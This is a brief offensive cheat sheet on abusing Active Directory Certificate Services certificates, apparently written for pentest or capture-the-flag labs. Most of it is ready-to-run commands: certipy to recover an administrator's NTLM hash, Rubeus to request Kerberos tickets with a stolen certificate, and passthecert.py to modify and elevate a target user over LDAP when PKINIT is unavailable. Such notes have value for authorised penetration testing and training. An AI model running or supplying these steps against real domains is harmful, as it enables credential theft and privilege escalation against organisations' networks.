Certificate Authentication

Authentication

Certificates in ADCS may have a variety of intended uses, called EKUs. Certain certificate templates contain the Client Authentication EKU which Active Directory accepts as a credential. Valid certificates can be used to authenticate to WinRM, LDAP, or other protocols for a variety of effects.

Retrieving NTLM

Many issued certs can be used to retrieve the NTLM hash of a user account.

certipy auth -pfx administrator.pfx -username administrator -domain lab.local -dc-ip 10.129.205.199

Importing PEM/PFX

PEM and PFX certificate files can be imported to logon sessions with Rubeus.

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
cat cert.pfx | base64 -w 0
Rubeus.exe asktgt /user:user /certificate:MIIM7w[...]ECAggA /password:pass123 /nowrap

PKINIT Authentication Disabled

If you attempt to authenticate via certificate and receive a PA_DATA_TYPE_NOT_SUPPORTED error, it means that the domain controller does not support the authentication EKU supplied in your certificate. However, you may still be able to use the certificate to initiate an authenticated LDAP session and perform actions on behalf of the certificate's principal.

openssl pkcs12 -in administrator.pfx -nocerts -out administrator.key
openssl pkcs12 -in administrator.pfx -clcerts -nokeys -out administrator.crt
openssl rsa -in administrator.key -out administrator-nopass.key
python3 passthecert.py -dc-ip 10.129.229.56 -crt administrator.crt -key administrator-nopass.key -domain authority.htb -port 636 -action modify_user -target victim -elevate